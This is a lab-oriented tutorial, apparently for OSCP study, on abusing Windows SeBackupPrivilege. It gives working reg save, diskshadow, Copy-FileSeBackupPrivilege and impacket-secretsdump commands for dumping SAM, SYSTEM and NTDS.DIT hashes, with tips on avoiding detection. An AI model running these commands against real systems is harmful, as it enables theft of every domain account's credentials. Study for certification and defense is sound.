Windows Privilege Escalation (SeBackupPrivilege)
How SeBackupPrivilege grants unrestricted read access to protected system files (SAM, SYSTEM and NTDS.DIT).
When I was grinding labs to prepare for OSCP, I came across a machine that required me to abuse SeBackupPrivilege. Many of the tutorials I found were long and more complex than they needed to be, but there is a simple way to escalate with this privilege.
SeBackupPrivilege ("Back up files and directories") is a Windows user right, normally held by Administrators and Backup Operators, that lets a process open any file for reading with backup semantics, regardless of the file's ACL. It does not give you code execution as SYSTEM by itself; the escalation comes from what you can read: the SAM and SYSTEM hives (local account hashes) or, on a domain controller, NTDS.DIT (the hash of every domain account). You can confirm you have it with whoami /priv; it is usually listed as Disabled, which is fine, because the tools below enable it in their own token.
1. Backup SAM, SYSTEM & NTDS.DIT
Backing up SAM and SYSTEM is straightforward: reg save is enough. RegSaveKey requires SeBackupPrivilege and reg.exe enables it for you, so the privilege showing as Disabled in whoami /priv is not a problem. You need both hives, because SYSTEM holds the boot key that decrypts the hashes in SAM (and in NTDS.DIT).
reg save HKLM\SAM C:\Windows\temp\SAM.bak
reg save HKLM\SYSTEM C:\Windows\temp\SYSTEM.bak
NTDS.DIT is the tricky part. It is held open by the directory service while the domain controller is running, so even with the privilege you cannot copy it directly. The workaround is to take a Volume Shadow Copy of C:, expose it as a drive letter, and copy the file out of the snapshot using backup semantics.
To perform the copy, I used the two .DLL files from the SeBackupPrivilege PowerShell module (SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll), which provide the Copy-FileSeBackupPrivilege cmdlet.
Once downloaded, the next step is to copy them to the target machine (I recommend placing them in C:\Windows\temp\).
Next, create a vss.dsh file with the following diskshadow script (C:\ProgramData is used for the metadata .cab because it is writable by ordinary users; make sure Z: is not already in use):
set context persistent nowriters
set metadata c:\programdata\test.cab
set verbose on
add volume c: alias test
create
expose %test% z:
Once created, place this script on the target machine (also) at C:\Windows\temp\.
Then, from a PowerShell session on the target, execute it using the following commands:
cd "C:\Windows\temp"
import-module .\SeBackupPrivilegeCmdLets.dll
import-module .\SeBackupPrivilegeUtils.dll
diskshadow /s C:\Windows\temp\vss.dsh
Copy-FileSeBackupPrivilege z:\Windows\ntds\ntds.dit C:\Windows\temp\NTDS.DIT.bak
If the script file was written on Linux, check that it has Windows (CRLF) line endings; diskshadow parses the file line by line and LF-only files are a common cause of "invalid command" errors (adding a trailing space to every line is the usual workaround). Do not forget to unexpose and delete the shadow copy when you are done: an extra Z: drive is a loud artifact.
Once done, the next step is to exfiltrate those files (SAM.bak, SYSTEM.bak & NTDS.DIT.bak) to our machine (Kali Linux).
2. Read the Backup Files (via Kali Linux)
Once everything has been transferred to your machine, extract the hashes from the backed-up files with Impacket's secretsdump. The trailing LOCAL argument tells it to parse the files offline instead of connecting to a host; -system is mandatory, because the SYSTEM hive supplies the boot key used to decrypt both SAM and NTDS.DIT. Expect NTDS.DIT from a real domain controller to take a while.
impacket-secretsdump -sam SAM.bak -system SYSTEM.bak -ntds NTDS.DIT.bak LOCAL
Conclusion
That's a quick tutorial on abusing SeBackupPrivilege to gain higher access on a Windows machine. The NT hashes it yields (the local Administrator's from SAM, or every domain account's, including krbtgt, from NTDS.DIT) can then be used directly with pass-the-hash tooling, so in practice this privilege is equivalent to full compromise of the host or the domain. If you need more insights, feel free to leave a comment below.